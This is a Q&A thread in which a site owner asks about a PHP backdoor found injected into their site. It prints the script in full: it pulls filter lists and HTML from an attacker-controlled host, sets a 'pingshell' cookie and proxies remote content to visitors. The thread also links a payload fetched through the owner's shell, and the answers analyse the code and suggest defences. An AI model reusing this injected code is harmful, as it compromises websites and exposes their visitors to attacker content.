# I was just hacked, but I don't know how or more importantly, why. Very odd code injected

Tags: php

**EDIT**: Good work all so far.

I've just found this being download and ran in my bash history:

http://notsoft.ru/glib

(safe to view)

Thanks all

---

I've just noticed the source php of my site has been edited. I've no idea how (I've changed all my passwords since) but what's really confuses me is why.

In a couple of pages there was a iframe placed, linking to an xml.php file which was placed in my images directory (the only directory accessible by HTACCESS. This code MUST have been hand placed as the pages are fairly complex and to auto place without braking these pages would have been near impossible.

Now the **REALLY** confusing thing is the contents of this XML.php file, as from what I can see it does nothing.

Here's the code:

```
<?php

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file

if(isset($_GET['ping'])){
    echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);

$ip = $exIps[0].".".$exIps[1].".".$exIps[2];

$ips = file_get_contents($urlIps);

if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
    die;
}

$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
    $userAgent = trim($arrUa[$ua]);
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
        die;
    }
}


if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki

    echo @file_get_contents($urlHtml);

}else{

?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
      document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">

<?php
}
?>
```

Am I missing something, or is this the strangest "hack" ever?? I've done my googling and can't find any reference to it happening before.

Comment: What do you mean, it does nothing? This code does some stuff, it gets some pages using `file_get_contents`, it outputs stuff (some `echo`es and even some js for a cookie), it makes the browser refresh...

Comment: But the URLS the file retrieves are as good as empty.

Comment: I'm curious to know what those comments are saying...

Comment: The value of `@file_get_contents($urlHtml);` is "tmp".  That's all.

Comment: I'm also curious to know what the comments say, unfortunately google translate doesn't match the language. The plot thickens too, http://mp3magicmag.com/frame/

Comment: I just checked whois, looks like the hacker is from russa, ill ask my buddy to translate the comments.

Comment: @Jonah Bron @Jon the language is russian, have a look: http://translate.google.it/translate_t?hl=&ie=UTF-8&text=esli+nashli+IP+v+file+to+ostanavlivaem+&sl=lt&tl=en#ru|en|%D0%B5%D1%81%D0%BB%D0%B8%20%D0%BD%D0%B0%D1%88%D0%BB%D0%B8%20%D1%82%D0%BE%20%D0%BE%D1%81%D1%82%D0%B0%D0%BD%D0%B0%D0%B2%D0%BB%D0%B8%D0%B2%D0%B0%D0%B5%D0%BC%20%D0%BF%D1%80%D0%BE%D1%86%D0%B5%D1%81%D1%81

Comment: Russian language, but phonetic as in wrong alphabet.  Mostly what you would expect "esli nashli IP v file to ostanavlivaem process" = "if found IP v file to dwell process".

Comment: *"proveriaem est' li kuki"* = "checks whether the cookie [exists]"

Comment: http://translate.google.it/translate_t?hl=&ie=UTF-8&text=esli+nashli+IP+v+file+to+ostanavlivaem+&sl=lt&tl=en#ru|en|%D0%BF%D1%80%D0%BE%D0%B2%D0%B5%D1%80%D1%8F%D0%B5%D0%BC%20%D0%B5%D1%81%D1%82%D1%8C%20%D0%BB%D0%B8%20%D0%BA%D1%83%D0%BA%D0%B8

Comment: I just found this in my bash history, basically someone logged in, downloaded and ran this then removed it: http://notsoft.ru/glib

Comment: @Jon So essentially they have access to your account, change your passwords immediately as a first step.  That bit of code tests for a vulnerability and then exploits it if found - think it's this one: http://blog.nibbles.fr/2230

Comment: @Orbling - good find. Still goes a little over my head (php is my limit, never got into the server stuff) but I've changed all the passwords... twice. It must have been a bruit force hack as my original password wasn't that clever (girls name followed by 4 numbers)

Comment: I had my buddy translate (He's russian:)

Comment: esli nashli IP v file to ostanavlivaem process
if IP is found terminate the process
esli nashli v User Agent'e to ostanavlivaem process..

proveriaem est' li kuki

Comment: esli nashli v User Agent'e to ostanavlivaem process.. If user agent is found termiante the process and proveriaem est' li kuki check to see if these are not your cookies

Comment: Also, if they succeeded in installing fake glib versions, your server is probably well screwed.

Answer (score 5, accepted):

Right what it does is as follows.

1. Checks to see if the script was called with `ping` if it was it replies and terminates
2. Downloads a list of valid server IPs and checks that the request came from one, terminates if not.
3. Downloads a list of user-agent strings and matches the browser against those to see if it is valid, if not it terminates.
4. If the cookie `pingshell` has been set previously then the HTML file is downloaded and displayed to the browser
5. Otherwise a cookie script is sent back to the browser, setting the `pingshell` cookie to a dummy value, valid for the entire domain.

Step 4 is the important bit, it looks like a proxy server to retrieve the HTML at the location given.  If the link is illegal, then it's not good.  Probably for marketing purposes though, they can use your URL to serve their content and get your users click-through data.

Having said that the code only allows any form of access from prescribed IP addresses, so unless they are capturing that information first, seems like it is designed for specific use by specific people.

Comment: It doesn't look like the code that's proxied does anything right now, likely to avoid detection and blacklisting by Google or other security companies. I'd bet that at some point, they'll throw something up and it will mass broadcast.

Comment: http://whois.domaintools.com/mp3magicmag.com You can try continuing to hunt down who owns the domain. But it is fake info on a gmail address, so good luck....

Comment: http://www.google.com/search?q=%22fllogic%40gmail.com yeah, really... Gooooood luck.

Comment: The code was added to the site on the 28th, so only 3 days ago. Amazingly google has already updated it's index, but this page is the only relevant result for snippets of the code.

Comment: @mattbasta Indeed.  Fairly standard practice to sow many seeds where conditions are harsh, so that good harvest may still be reaped.

Answer (score 2):

Looks like part of an automated script. This would be used to confirm that the auto-attack was successful, and to rank up a big list of places to return to. Among other things. (Jonah Bron brings up some other things)

EDIT

What you can do is gut the code and monitor calls to the file in a log. See what someone tries to do with it.

Comment: not a bad idea, I just wish I knew how it got there. Whether it was brute force ftp password, issues with the shared host or my home PC is compromised. Either way it's not good, I live off this site...

Comment: It could have been through ftp. You can find that out, your host should have logs of the ips used to connect to ftp, if you are the only one using it, ask them and you'll figure out if anyone else connected. But more than likely it wasn't targeted. This kind of thing is normally done, like I said, through an automated script. Do you have any forms on your site? Using exec() to hit the commandline.

Answer (score 1):

Make sure you have safe mode enabled in your php.ini to avoid such scripts opening remote unsafe files..

Comment: Thanks for the tip, unfortunately it's on a shared host (1and1) but I'll set up a local one. I just wish I knew how this happened.

Comment: happened to me too, a couple of times, not on my sites but on my colleagues' or customers'.. sometimes they gained access from unprotected fopen's, in other cases I just couldn't figure.
I'd really like to know as well

Answer (score 0):

Looks like they want to use your site to broaden their cookie tracking system.  The `Status: ping successful` thing looks like a function for them to check the integrity of their hack periodically.  It also sends the IP addresses of all of your visitors to their server.